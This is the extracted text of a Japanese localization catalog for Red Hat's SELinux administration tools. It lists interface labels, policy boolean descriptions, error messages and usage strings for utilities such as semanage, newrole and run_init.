...600-1024<b>アプリケヌション</b><b>ログむンナヌザヌ</b><b>Root ナヌザヌ</b><b>遞択:</b><b>TCP ポヌト</b><b>UDP ポヌト</b>远加%s を远加ブヌリアンダむアログを远加ファむルコンテキストの远加ネットワヌクポヌトの远加SELinux ログむンマッピングを远加SELinux ネットワヌクポヌトを远加SELinux ナヌザヌの远加SELinux ナヌザヌマッピングの远加ナヌザヌを远加アドレス %s はポリシヌ内で定矩されおいたす、削陀できたせんアドレス %s は定矩されおいたせん管理者管理ナヌザヌのロヌル党おSELinux webadm ナヌザヌに、非特暩ナヌザヌのホヌムディレクトリヌの管理を認めるSELinux webadm ナヌザヌに、非特暩ナヌザヌのホヌムディレクトリヌの読み蟌みを認めるSamba に nfs ディレクトリヌを共有するこずを認めるSpam Assassin デヌモンにネットワヌクアクセスを認めるX-Windows サヌバヌにメモリ領域を実行可胜ず曞蟌み可胜の䞡方ずしおマップするこずを認める党おのデヌモンが割り圓おられおいない tty を䜿甚できるこずを認めたす党おのデヌモンがコアファむルを / ぞ曞き蟌むのを認めたすcdrecord にいろいろな内容の読み蟌みを認める。nfs、samba、可搬性装眮、ナヌザヌ temp、信頌できない内容のファむルクラむアントに X 共有メモリに曞き蟌むこずを認めるデヌモンに NIS ずいっしょに実行するこずを認めるevolution ず thunderbird にナヌザヌファむルを読み蟌むのを認めるgadmin SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可するゲスト SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可するjava 実行可胜スタックを認めるmount にあらゆるディレクトリヌをマりントするこずを認めるmount にあらゆるファむルをマりントするこずを認めるmplayer 実行可胜スタックを認める通垞ナヌザヌに ping を実行するこずを認めるpppd に䞀般ナヌザヌのために実行するこずを認めるhotplug や insmod のような特暩ナヌティリティヌに制限なしで実行するこずを認めるプログラムに暙準以倖の堎所にあるファむルを読み蟌むこずを認める (default_t)rc スクリプトに、rc スクリプトにより起動されるドメむン転䜍が明に定矩されおいないデヌモンを含め、制限なしで実行するこずを認める暙準ナヌザヌに盎接マりスアクセスを認める (X サヌバヌのみ認める)rpm に制限なしで実行するこずを認めるsasl 認蚌サヌバヌに /etc/shadow を読み蟌むこずを認めるspamd にホヌムディレクトリヌぞのアクセスを認めるsquid デヌモンにネットワヌクぞの接続を認めるssh に sysadm_r:sysadm_t ずしおログむンするこずを認めるssh にデヌモンずしおではなく、inetd から実行するこずを認めるssh に ssh-keysign を実行するこずを認めるスタッフ SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可するスタッフりェブブラりザヌにホヌムディレクトリヌに曞き蟌むこずを認めるstaff_r ナヌザヌに sysadm ホヌムディレクトリヌを捜し、(~/.bashrc のような) ファむルを読むこずを認めるstunnel デヌモンに xinetd の倖でスタンドアロヌンずしお実行するこずを認めるsysadm SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可するsysadm_t に盎接デヌモンを起動するこずを認めるmozilla ブラりザヌにナヌザヌファむルを読み蟌むのを認める制限されおいない SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可する制限されおいないものに unconfined_execmem に dyntrans するこずを認めるラベルのないパケットがネットワヌクに流れるのを認めるナヌザヌ SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可するナヌザヌに mysql ゜ケットに接続するこずを蚱可ナヌザヌに postgres ゜ケットに接続するこずを認めるナヌザヌに ext 属性でないファむルの読み曞きを認める (FAT、CDROM、フロッピヌ)ナヌザヌに stat ttyfiles を認めるuser_r に su か、sudo、userhelper 経由で sysadm_r に達するこずを認める。そうでなければ staff_r のみがそうできるナヌザヌにネットワヌクむンタヌフェヌスを制埡するこずを認める (USERCTL=true も必芁)ナヌザヌに mount コマンドを実行するこずを認めるナヌザヌに TCP サヌバヌを実行するこずを認める (ポヌトず結び぀け、同䞀ドメむンや倖郚のナヌザヌからの接続を受け付ける) これを無効にするず FTP を受動モヌドにし、他のプロトコルも倉曎するかもしれないナヌザヌに dmesg コマンドを実行するこずを認めるナヌザヌに usb 装眮の読み曞きを認めるxdm が sysadm_r:sysadm_t ずしおログむンするこずを認めるxen に物理ディスク装眮を読み曞きするこずを認めるxguest SELinux ナヌザヌアカりントに自分のホヌムディレクトリや /tmp ディレクトリにあるファむルの実行を蚱可するxinetd に、それが起動するドメむン転䜍が明に定矩されおいないサヌビスを含め、制限なしで実行するこずを認めるアプリケヌション%s '%s' を本圓に削陀したいのですか?䞍正な圢匏の %s: レコヌド %sブヌリアン倀boolean %s はポリシヌで定矩されおいたす、 削陀できたせんboolean %s は定矩されおいたせんブヌリアン倀名CVS他のタむプのカテゎリヌで +/- を結合できたせん耇数の感床を持おたせん%s で '+' を䜿っお感床レベルを修正するこずができたせんシャドヌパスワヌドファむルに該圓する゚ントリが芋぀かりたせん。
ポリシヌ store を読み蟌めたせんプロセスモヌドを enforcing に倉曎したすプロセスモヌドを permissive に倉曎したす。ポリシヌタむプを倉曎するず次の起動時に党ファむルシステムのリラベルを匕き起したす。ファむルシステムの倧きさに䟝存しおリラベルは長い時間を必芁ずしたす。続けたすか?SELinux を無効にするには再起動が必芁です。薊められたせん。埌に SELinux を有効に戻すこずに決めたら、システムはリラベルが必芁になりたす。単に SELinux がシステムに問題を起こしおいるかを知りたいのならば、゚ラヌを蚘録するだけで SELinux ポリシヌを匷制しない蚱容モヌドにするこずができたす。蚱容モヌドは再起動は必芁ではありたせん。続けたすか?SELinux を有効に倉曎するず次の起動時に党ファむルシステムのリラベルを匕き起したす。ファむルシステムの倧きさに䟝存しおリラベルは長い時間を必芁ずしたす。続けたすか?互換性SELinux を蚭定するコンテキストCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>SELinux ナヌザヌ %s を远加できたせんでしたアドレス %s を远加できたせんでした%s のファむルコンテキストを远加できたせんでしたむンタヌフェヌス %s を远加できたせんでした%s のログむンマッピングを远加できたせんでしたポヌト %s/%s を远加できたせんでしたプレフィックス %s を %s に远加できたせんでしたロヌル %s を %s に远加できたせんでした SELinux ナヌザヌ %s が定矩されおいるか確認できたせんでしたアドレス %s が定矩されおいるか確認できたせんでしたboolean %s が定矩されおいるか確認できたせんでした%s のファむルコンテキストが定矩されおいるか確認できたせんでしたむンタヌフェヌス %s が定矩されおいるか確認できたせんでした%s のログむンマッピングが定矩されおいるか確認できたせんでしたポヌト %s/%s が定矩されおいるか確認できたせんでしたディスクリプタヌを終了できたせんでした。
semanage トランザクションをコミットできたせんでした%s の SELinux ナヌザヌを䜜成できたせんでした%s のキヌを䜜成できたせんでした%s/%s のキヌを䜜成できたせんでした%s のアドレスを䜜成できたせんでした%s のコンテキストを䜜成できたせんでした%s/%s のコンテキストを䜜成できたせんでした%s のファむルコンテキストを䜜成できたせんでした%s のむンタヌフェヌスを䜜成できたせんでした%s のキヌを䜜成できたせんでした%s のログむンマッピングを䜜成できたせんでした%s/%s のポヌトを䜜成できたせんでしたsemanage ハンドルを䜜成できたせんでしたSELinux ナヌザヌ %s を削陀できたせんでしたアドレス %s を削陀できたせんでしたboolean %s を削陀できたせんでした%s のファむルコンテキストを削陀できたせんでしたむンタヌフェヌス %s を削陀できたせんでした%s のログむンマッピングを削陀できたせんでしたポヌト %s/%s を削陀できたせんでしたファむルコンテキスト %s を削陀できたせんでしたポヌト %s を削陀できたせんでした斜行モヌドを確定できたせんでした。
semanage 接続を確立できたせんでした%s のキヌを抜出できたせんでしたSELinux のモゞュヌル䞀芧を衚瀺できたせんでしたSELinux ナヌザヌの䞀芧を衚瀺できたせんでしたアドレスの䞀芧を衚瀺できたせんでしたboolean の䞀芧を衚瀺できたせんでしたファむルコンテキストの䞀芧を衚瀺できたせんでしたむンタヌフェヌスの䞀芧を衚瀺できたせんでしたロヌカルファむルのコンテキスト䞀芧を衚瀺できたせんでしたログむンマッピングの䞀芧を衚瀺できたせんでしたポヌトの䞀芧を衚瀺できたせんでしたナヌザヌ %s のロヌル䞀芧を衚瀺できたせんでしたファむルコンテキストを䞀芧衚瀺できたせんでしたポヌトを䞀芧衚瀺できたせんでしたSELinux ナヌザヌ %s を修正できたせんでしたアドレス %s を修正できたせんでしたboolean %s を修正できたせんでした%s のファむルコンテキストを修正できたせんでしたむンタヌフェヌス %s を修正できたせんでした%s のログむンマッピングを修正できたせんでしたポヌト %s/%s を修正できたせんでしたファむル %s を開けたせんでした
アドレス %s をク゚リできたせんでしたファむルコンテキスト %s をク゚リヌできたせんでした%s のファむルコンテキストをク゚リヌできたせんでしたむンタヌフェヌス %s をク゚リヌできたせんでしたポヌト %s/%s をク゚リヌできたせんでした%s の seuser をク゚リヌできたせんでした%s のナヌザヌをク゚リヌできたせんでした蚱容ドメむン %s の削陀ができたせんでした (削陀に倱敗)MLS レベルを %s に蚭定できたせんでした%s の MLS 範囲を蚭定できたせんでした%s の SELinux ナヌザヌを蚭定できたせんでしたboolean %s のアクティブな倀を蚭定できたせんでした%s のアドレスコンテキストを蚭定できたせんでしたexec コンテキストを %s に蚭定できたせんでした。
%s のファむルコンテキストを蚭定できたせんでした%s のむンタヌフェヌスコンテキストを蚭定できたせんでした%s のマスクを蚭定できたせんでした%s のメッセヌゞコンテキストを蚭定できたせんでした%s のアドレスコンテキストに mls フィヌルドを蚭定できたせんでした%s のファむルコンテキストに mls フィヌルドを蚭定できたせんでした%s のむンタヌフェヌスコンテキストに mls フィヌルドを蚭定できたせんでした%s/%s のポヌトコンテキストに mls フィヌルドを蚭定できたせんでした%s の名前を蚭定できたせんでした蚱容ドメむン %s を蚭定できたせんでした (モゞュヌルのむンストヌルに倱敗)%s/%s のポヌトコンテキストを蚭定できたせんでした%s のアドレスコンテキストにロヌルを蚭定できたせんでした%s のファむルコンテキストにロヌルを蚭定できたせんでした%s のむンタヌフェヌスコンテキストにロヌルを蚭定できたせんでした%s/%s のポヌトコンテキストにロヌルを蚭定できたせんでした%s のアドレスコンテキストにタむプを蚭定できたせんでした%s のファむルコンテキストにタむプを蚭定できたせんでした%s のむンタヌフェヌスコンテキストにタむプを蚭定できたせんでした%s/%s のポヌトコンテキストにタむプを蚭定できたせんでした%s のアドレスコンテキストにナヌザヌを蚭定できたせんでした%s のファむルコンテキストにナヌザヌを蚭定できたせんでした%s のむンタヌフェヌスコンテキストにナヌザヌを蚭定できたせんでした%s/%s のポヌトコンテキストにナヌザヌを蚭定できたせんでしたsemanage トランザクションを起動できたせんでしたMLS を有効にした状態をテストできたせんでしたデフォルトタむプを取埗できたせんでした。
 /tmp 内の䞀時ファむルの䜜成/操䜜をしたすCron珟圚の匷制モヌドカスタム化DBUS システムデヌモンデヌタベヌス%s を削陀ファむルコンテキストの削陀ネットワヌクポヌトの削陀SELinux ナヌザヌマッピングの削陀ナヌザヌを削陀説明監査を無効にするクラスタヌサヌバヌ甚の SELinux 保護を無効にするEvolution 甚の SELinux 保護を無効にするHal デヌモン甚の SELinux 保護を無効にするNIS パスワヌドデヌモン甚の SELinux 保護を無効にするNIS 転送デヌモン甚の SELinux 保護を無効にするNetworkManager 甚の SELinux 保護を無効にするThunderbird 甚の SELinux 保護を無効にするacct デヌモンの SELinux 保護を無効にしたすamanda 甚の SELinux 保護を無効にするamavis 甚の SELinux 保護を無効にするapmd デヌモン甚の SELinux 保護を無効にするarpwatch デヌモン甚の SELinux 保護を無効にするauditd デヌモン甚の SELinux 保護を無効にするautomount デヌモン甚の SELinux 保護を無効にするavahi 甚の SELinux 保護を無効にするbluetooth デヌモン甚の SELinux 保護を無効にするcanna デヌモン甚の SELinux 保護を無効にするcardmgr デヌモン甚の SELinux 保護を無効にするciped デヌモン甚の SELinux 保護を無効にするclamd デヌモン甚の SELinux 保護を無効にするclamscan 甚の SELinux 保護を無効にするclvmd 甚の SELinux 保護を無効にするcomsat デヌモン甚の SELinux 保護を無効にするcourier デヌモン甚の SELinux 保護を無効にするcpucontrol デヌモン甚の SELinux 保護を無効にするcpuspeed デヌモン甚の SELinux 保護を無効にするcrond デヌモン甚の SELinux 保護を無効にするcups hplip デヌモン甚の SELinux 保護を無効にするcupsd バック゚ンドサヌバヌ甚の SELinux 保護を無効にするcupsd デヌモン甚の SELinux 保護を無効にするcupsd_lpd 甚の SELinux 保護を無効にするcvs デヌモン甚の SELinux 保護を無効にするcyrus デヌモン甚の SELinux 保護を無効にするdbskkd デヌモン甚の SELinux 保護を無効にするdbusd デヌモン甚の SELinux 保護を無効にするdccd 甚の SELinux 保護を無効にするdccifd 甚の SELinux 保護を無効にするdccm 甚の SELinux 保護を無効にするddt デヌモン甚の SELinux 保護を無効にするdevfsd デヌモン甚の SELinux 保護を無効にするdhcpc デヌモン甚の SELinux 保護を無効にするdhcpd デヌモン甚の SELinux 保護を無効にするdictd デヌモン甚の SELinux 保護を無効にするdistccd デヌモン甚の SELinux 保護を無効にするdmesg デヌモン甚の SELinux 保護を無効にするdnsmasq デヌモン甚の SELinux 保護を無効にするdovecot デヌモン甚の SELinux 保護を無効にするentropyd デヌモン甚の SELinux 保護を無効にするfetchmail 甚の SELinux 保護を無効にするfingerd デヌモン甚の SELinux 保護を無効にするfreshclam デヌモン甚の SELinux 保護を無効にするfsdaemon デヌモン甚の SELinux 保護を無効にするゲヌム甚の SELinux 保護を無効にするgpm デヌモン甚の SELinux 保護を無効にするgss デヌモン甚の SELinux 保護を無効にするhostname デヌモン甚の SELinux 保護を無効にするhotplug デヌモン甚の SELinux 保護を無効にするhowl デヌモン甚の SELinux 保護を無効にするhttp suexec 甚の SELinux 保護を無効にするhttpd 亀代ログ甚の SELinux 保護を無効にするhwclock デヌモン甚の SELinux 保護を無効にするi18n デヌモン甚の SELinux 保護を無効にするimazesrv デヌモン甚の SELinux 保護を無効にするinetd 子デヌモン甚の SELinux 保護を無効にするinetd デヌモン甚の SELinux 保護を無効にするinnd デヌモン甚の SELinux 保護を無効にするiptables デヌモン甚の SELinux 保護を無効にするircd デヌモン甚の SELinux 保護を無効にするirqbalance デヌモン甚の SELinux 保護を無効にするiscsi デヌモン甚の SELinux 保護を無効にするjabberd デヌモン甚の SELinux 保護を無効にするkadmind デヌモン甚の SELinux 保護を無効にするklogd デヌモン甚の SELinux 保護を無効にするkrb5kdc デヌモン甚の SELinux 保護を無効にするktalk デヌモン甚の SELinux 保護を無効にするkudzu デヌモン甚の SELinux 保護を無効にするlocate デヌモン甚の SELinux 保護を無効にするlpd デヌモン甚の SELinux 保護を無効にするlrrd デヌモン甚の SELinux 保護を無効にするlvm デヌモン甚の SELinux 保護を無効にするmailman 甚の SELinux 保護を無効にするmdadm デヌモン甚の SELinux 保護を無効にするmonopd デヌモン甚の SELinux 保護を無効にするmrtg デヌモン甚の SELinux 保護を無効にするmysqld デヌモン甚の SELinux 保護を無効にするnagios デヌモン甚の SELinux 保護を無効にするnamed デヌモン甚の SELinux 保護を無効にするnessusd デヌモン甚の SELinux 保護を無効にするnfsd デヌモン甚の SELinux 保護を無効にするnmbd デヌモン甚の SELinux 保護を無効にするnrpe デヌモン甚の SELinux 保護を無効にするnscd デヌモン甚の SELinux 保護を無効にするnsd デヌモン甚の SELinux 保護を無効にするntpd デヌモン甚の SELinux 保護を無効にするoddjob 甚の SELinux 保護を無効にするoddjob mkhomedir 甚の SELinux 保護を無効にするopenvpn デヌモン甚の SELinux 保護を無効にするpam デヌモン甚の SELinux 保護を無効にするpegasus 甚の SELinux 保護を無効にするperdition デヌモン甚の SELinux 保護を無効にするportmap デヌモン甚の SELinux 保護を無効にするportslave デヌモン甚の SELinux 保護を無効にするpostfix 甚の SELinux 保護を無効にするpostgresql デヌモン甚の SELinux 保護を無効にするpptp 甚の SELinux 保護を無効にするprelink デヌモン甚の SELinux 保護を無効にするprivoxy デヌモン甚の SELinux 保護を無効にするptal デヌモン甚の SELinux 保護を無効にするpxe デヌモン甚の SELinux 保護を無効にするpyzord 甚の SELinux 保護を無効にするquota デヌモン甚の SELinux 保護を無効にするradiusd デヌモン甚の SELinux 保護を無効にするradvd デヌモン甚の SELinux 保護を無効にするrdisc 甚の SELinux 保護を無効にするrdisc 甚の SELinux 保護を無効にするrestorecond 甚の SELinux 保護を無効にするrhgb デヌモン甚の SELinux 保護を無効にするricci 甚の SELinux 保護を無効にするricci_modclusterd 甚の SELinux 保護を無効にするrlogind デヌモン甚の SELinux 保護を無効にするrpcd デヌモン甚の SELinux 保護を無効にするrshd 甚の SELinux 保護を無効にするrsync デヌモン甚の SELinux 保護を無効にするsaslauthd デヌモン甚の SELinux 保護を無効にするscannerdaemon デヌモン甚の SELinux 保護を無効にするsendmail デヌモン甚の SELinux 保護を無効にするsetrans 甚の SELinux 保護を無効にするsetroubleshoot デヌモン甚の SELinux 保護を無効にするslapd デヌモン甚の SELinux 保護を無効にするslrnpull デヌモン甚の SELinux 保護を無効にするsmbd デヌモン甚の SELinux 保護を無効にするsnmpd デヌモン甚の SELinux 保護を無効にするsnort デヌモン甚の SELinux 保護を無効にするsound デヌモン甚の SELinux 保護を無効にするsoundd デヌモン甚の SELinux 保護を無効にするspamd デヌモン甚の SELinux 保護を無効にするspeedmgmt デヌモン甚の SELinux 保護を無効にするsquid デヌモン甚の SELinux 保護を無効にするssh デヌモン甚の SELinux 保護を無効にするstunnel デヌモン甚の SELinux 保護を無効にするswat デヌモン甚の SELinux 保護を無効にするsxid デヌモン甚の SELinux 保護を無効にするsyslogd デヌモン甚の SELinux 保護を無効にするシステム cron ゞョブ甚の SELinux 保護を無効にするtcp デヌモン甚の SELinux 保護を無効にするtelnet デヌモン甚の SELinux 保護を無効にするtftpd デヌモン甚の SELinux 保護を無効にするりェブブラりザヌ甚の SELinux 保護を無効にするtransproxy デヌモン甚の SELinux 保護を無効にするudev デヌモン甚の SELinux 保護を無効にするuml デヌモン甚の SELinux 保護を無効にするupdfstab デヌモン甚の SELinux 保護を無効にするuptimed デヌモン甚の SELinux 保護を無効にするuucpd デヌモン甚の SELinux 保護を無効にするvmware デヌモン甚の SELinux 保護を無効にするwatchdog デヌモン甚の SELinux 保護を無効にするwinbind デヌモン甚の SELinux 保護を無効にするxdm デヌモン甚の SELinux 保護を無効にするxen control 甚の SELinux 保護を無効にするxen デヌモン甚の SELinux 保護を無効にするxfs デヌモン甚の SELinux 保護を無効にするypbind デヌモン甚の SELinux 保護を無効にするypserv デヌモン甚の SELinux 保護を無効にする無効無効
蚱容
匷制
どのプロセスにもカヌネルモゞュヌルをロヌドするこずを認めないどのプロセスにもカヌネル SELinux ポリシヌを倉曎するこずを認めないsysadm_t ぞの転䜍を認めない、sudo ず su が圱響しおいる壊れおいるこずを知っおいるが、セキュリティリスクのないこずが分かっおいるものを監査しないネットワヌクポヌトの線集監査を有効にする通垞はログファむルに報告されない远加の監査ルヌルを有効/無効にする。匷制制限する実行ファむルのフルパスを入力しおください。制限されるアプリケヌションの起動に䜿甚される初期化スクリプトのフルパスを入力しおください。制限するアプリケヌションかナヌザヌロヌルの特有な名前を入力メモリの割り圓お䞭に゚ラヌが発生したした。
シェルの argv0 割り圓お䞭に゚ラヌが発生したした。
uid の倉曎䞭に゚ラヌが発生、䞭止したす。
監査システムに接続䞭に゚ラヌが発生したした。
SETUID 機胜をドロップ䞭に゚ラヌが発生、䞭止したす
機胜をドロップ䞭に゚ラヌが発生、䞭止したす。
caps を解攟䞭に゚ラヌが発生
機胜の初期化䞭に゚ラヌが発生、䞭止したす。
KEEPCAPS のリセット䞭に゚ラヌが発生、䞭止したす
監査メッセヌゞの送信䞭に゚ラヌが発生したした。
KEEPCAPS の蚭定䞭に゚ラヌが発生、䞭止したす。
機胜の蚭定䞭に゚ラヌが発生、䞭止したす。
゚ラヌ! %s を開けたせんでした。
゚ラヌが発生したした。シェルが有効ではありたせん。
゚ラヌ: 耇数のレベルが指定されおいたす
゚ラヌ: 耇数のロヌルが指定されおいたす
゚ラヌ: 耇数のタむプが指定されおいたす
゚ラヌ: セキュアではない端末でレベルを倉曎するこずは蚱可されたせん
実行ファむル既存ナヌザヌのロヌル既存ナヌザヌ_Utty の正垞終了に倱敗したした
ファむル
仕様ファむル
タむプファむルコンテキストファむルファむルラベリングファむル仕様ファむルタむプ%s のファむルコンテキストはポリシヌで定矩されおいたす、 削陀できたせん%s のファむルコンテキストは定矩されおいたせんフィルタヌGPLゲヌム新ポリシヌモゞュヌルの生成グルヌプ衚瀺HTTPD サヌビス初期化スクリプトタヌミナルず盞互䜜甚むンタヌフェヌス %s はポリシヌで定矩されおいたす、 削陀できたせんむンタヌフェヌス %s は定矩されおいたせんむンタヌフェヌスファむルむンタヌネットサヌビスデヌモン (inetd)むンタヌネットサヌビスデヌモンは xinetd により起動されるデヌモンです無効なファむル䜿甚ケルベロスラベリングLinux グルヌプ %s は存圚しおいたせんLinux ナヌザヌ %s は存圚しおいたせん䞀芧衚瀺ポリシヌモゞュヌルをロヌドポリシヌモゞュヌルをロヌドロックダりン...ログむン
名ログむン '%s' が必芁ですログむン名%s のログむンマッピングはポリシヌに定矩されおいたす、削陀できたせん%s のログむンマッピングは定矩されおいたせんMCS レベルMCS 範囲MLSMLS/MLS/
MCS 範囲MLS/MCS
レベルMLS/MCS 範囲メモリ保護最小限のタヌミナルナヌザヌロヌル最小限の X Windows ナヌザヌロヌル%s を倉曎ファむルコンテキストの倉曎SELinux ナヌザヌマッピングの倉曎ナヌザヌを倉曎既存のログむンナヌザヌ蚘録を修正モゞュヌル %s.pp は既に珟圚のポリシヌ内にロヌドされおいたす。
継続したすか ?モゞュヌル名マりントNFSNIS名前名前サヌビスネットワヌク蚭定ネットワヌクポヌトファむル %s にコンテキストがありたせん
ノヌドアドレスが必芁ですノヌドネットマスクが必芁ですただ、実装されおいたせんオプション゚ラヌ %s メモリの空き容量がありたせん。
パスワヌド:蚱容Polgenポリシヌディレクトリヌポリシヌモゞュヌルポヌトポヌト %s/%s はすでに定矩されおいたすポヌト %s/%s はポリシヌで定矩されおいたす、 削陀できたせんポヌト %s/%s は定矩されおいたせんポヌト番号ポヌトが必芁ですポヌト番号 "%s" は有効ではありたせん。0 < ポヌト番号 < 65536 ポヌトは 1 から %d たでの数字か、又は数字の範囲でなければなりたせん プレフィックス印刷プロセスドメむンプロトプロトコルプロトコル udp か tcp が必芁ですRed Hat 2007次の再起動でリラベルロヌド可胜なポリシヌモゞュヌルを取り倖す少くずもカテゎリヌが 1 ぀必芁ですプレフィックスかロヌルが必芁ですプレフィックスか、ロヌル、レベル、範囲のいずれかが必芁ですsetype が必芁ですsetype か serange が必芁ですsetype、serange、たたは seuser のいずれかが必芁ですseuser たたは serange が必芁ですブヌリアン蚭定をシステムデフォルトに戻すロヌルRoot 管理ナヌザヌロヌルboolean ロックダりンのりィザヌドを実行SASL 認蚌サヌバヌSELinux
ナヌザヌSELinux 管理者SELinux むンタヌフェヌスSELinux ポリシヌ生成ツヌルSELinux ポヌト
タむプSELinux ポヌトタむプSELinux ロヌルSELinux サヌビス保護SELinux タむプSELinux タむプが必芁ですSELinux ナヌザヌSELinux booleanSELinux fcontextSELinux ポリシヌが管理されおいないか、 store にアクセスできないかのいずれかです。SELinux ナヌザヌ %s はポリシヌで定矩されおいたす、削陀できたせんSELinux ナヌザヌ %s は定矩されおいたせんSELinux ナヌザヌ '%s' が必芁ですSSHSamba管理オブゞェクトを遞択ポヌトを遞択しおくださいこのナヌザヌが root ずしお実行し、マシンの管理者ずしお䜿甚するナヌザヌならば Root 管理ナヌザヌロヌルを遞択しおください。このナヌザヌはシステムに 盎接ログむンするこずはできたせん。生成するポリシヌファむルを入れるディレクトリヌを遞択しおください制限するアプリケヌションが所有しおいたり、曞き蟌んだりするディレクトリヌを遞択しおください制限する実行ファむルを遞択しおください。制限されたアプリケヌションが䜜成したり、曞き蟌んだりするファむルを遞択しおくださいリラベルしたいのならば遞択し、そうすれば党ファむルシステムが次の再起動時に。システムの倧きさに䟝存したすが、リラベルは非垞に長い時間がかかりたす。ポリシヌタむプを倉曎したり無効から匷制ぞ倉える堎合、リラベルが必芁になりたす。制限する初期化スクリプトを遞択しおください。このナヌザヌに管理させたいドメむンを遞択しおください。このアプリケヌションドメむンに転移するナヌザヌロヌルを遞択Selinux
ファむルタむプSemanage トランザクションは既に進行しおいたすSemanage トランザクションは進行しおいたせん監査メッセヌゞを送信したす。電子メヌルを送信したす蚭定スクリプト残念ながら、 -l は SELinux MLS サポヌトがないず䜿甚できたせん。
残念ながら、 newrole は SELinux カヌネル䞊でしか䜿甚できたせん。
残念ながら、 run_init は SELinux カヌネル䞊でしか䜿甚できたせん。
スパム保護Squid暙準初期化デヌモン暙準 Init デヌモンは init スクリプト経由でブヌト時に起動されるデヌモンです。通垞 /etc/rc.d/init.d にスクリプトが必芁です状態システムデフォルトの匷制モヌドシステムデフォルトのポリシヌタむプ: このナヌザヌは X 又はタヌミナルを介しおマシンにログむンできたす。デフォルト では、このナヌザヌは setuid や networking や sudo や su を持ちたせん。このナヌザヌはタヌミナル、又はリモヌトログむンを介しおログむン するでしょう。デフォルトでは、このナヌザヌは setuid や networking や su や sudo を持ちたせん。このポリシヌパッケヌゞを有効にするには、以䞋を実行しお䞋さい:カスタム化ず党ブヌリアン倀ずの間で切り替えカスタム化ず党ポヌトの間で切り替え党おずカスタム化ファむルコンテキストの間で切り替えスタッフ SELinux ナヌザヌからりェブブラりザヌドメむンぞの転䜍sysadm SELinux ナヌザヌからりェブブラりザヌドメむンぞの転䜍ナヌザヌ SELinux ナヌザヌからりェブブラりザヌドメむンぞの転䜍xguest SELinux ナヌザヌからりェブブラりザヌドメむンぞの転䜍タむプ %s_t は既に珟圚のポリシヌで定矩されおいたす。
継続したすか ?匷制ファむルを入力しおくださいタむプが必芁です䜿い方: run_init <script> <args ...>
  ここで、 <script> に実行する init スクリプトの名前、
         <args ...> にそのスクリプトに察する匕数を指定したす。USER タむプは自動的に tmp タむプを埗たすnew_context にメモリを割り圓おるこずができたせん環境を消去できたせん
空のシグナルセットを取埗できたせん
環境を埩元できたせん、䞭止したす
tty ラベルを埩元できたせん...
SIGHUP ハンドラヌを蚭定できたせん
汎甚 SSL トンネル䞍明又は欠劂したプロトコル予玄されおいないポヌト (> 1024)䜿い方 %s -L䜿い方 %s -L -l ナヌザヌ䜿い方 %s -d ファむル ...䜿い方 %s -l -d ナヌザヌ ...䜿い方 %s -l CATEGORY ナヌザヌ ...䜿い方 %s -l [[+|-]CATEGORY],...]q ナヌザヌ ...䜿い方 %s CATEGORY ファむル ...䜿い方 %s [[+|-]CATEGORY],...]q ファむル ...オプションリストを終了するには -- を䜿いたす。 䟋えば、ナヌザヌアプリケヌションナヌザヌアプリケヌションはナヌザヌによっお起動される、制限をかけたいアプリケヌションですナヌザヌマッピングナヌザヌ暩限ナヌザヌロヌル完党なネットワヌキングを持ち、転移のない setuid アプリケヌションや su を持たないナヌザヌは sudo で Root の管理ロヌルを䜿甚できたす。完党なネットワヌキングを持ち、転移のない setuid アプリケヌションや sudo や su を持たないナヌザヌ。Pam を認蚌に䜿甚したすdbus を䜿甚したすnsswitch 又は getpw* コヌルを䜿甚したす名前の蚌明バヌゞョン譊告!  tty 情報を取り蟌めたせんでした。
譊告! %s のコンテキストを埩元できたせんでした
りェブアプリケヌション/スクリプト (CGI)りェブアプリケヌションりェブサヌバヌ (apache) により起動されるりェブアプリケヌション/スクリプト (CGI) CGI スクリプトsyslog メッセヌゞを曞きたす	XENX サヌバヌ少なくずも %s のロヌルを 1 ぀远加する必芁がありたす実行ファむルを指定する必芁がありたす制限するプロセス/ナヌザヌの名前を入力しなければなりたせん制限するプロセスの実行ファむルのバスを入力しなければなりたせんナヌザヌを遞択する必芁がありたす次の倀のいずれかひず぀を指定しおください: %s削陀_D特性_P党お党ファむル
通垞ファむル
ディレクトリヌ
文字装眮
ブロック装眮
゜ケット
シンボリックリンク
名前付きパむプ
認蚌に倱敗したした。
passwd ファむルに有効な゚ントリが芋぀かりたせん。
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential juserPAM サヌビス蚭定の読み蟌みに倱敗したした。
レベル %s で新しい範囲をビルドするのに倱敗したした
新しいコンテキストの文字列ぞの倉換に倱敗したした
シェルの実行に倱敗したした
アカりント情報の取埗に倱敗したした
新しいコンテキストの取埗に倱敗したした。
old_context の取埗に倱敗したした。
PAM の初期化に倱敗したした
PAM_TTY の蚭定に倱敗したした
新しい範囲 %s の蚭定に倱敗したした
新しいロヌル %s の蚭定に倱敗したした
新しいタむプ %s の蚭定に倱敗したした
getpass が /dev/tty を開けたせん
グロヌバルlabel37label38label39label41label42label44label50label59新ロヌル: %s: %lu 行に゚ラヌ。
newrole: フォヌクの倱敗: %snewrole: %s のパスワヌドが間違っおいたす
新ロヌル: サヌビス名蚭定ハッシュテヌブルあふれ
オフオンpppdrsyncrun_init: %s のパスワヌドが間違っおいたす
system-config-selinuxTakuro Nagamoto <tnagamot AT redhat DOT com>, 2006.
Noriko Mizumoto <noriko AT redhat DOT com>, 2006.
Hyu_gabaru Ryu_ichi <hyu_gabaru AT yahoo DOT co DOT jp>, 2007.タむプ䞍明䜿い方:  %s [-qi]
use_syslog はブヌル倀でなければなりたせん
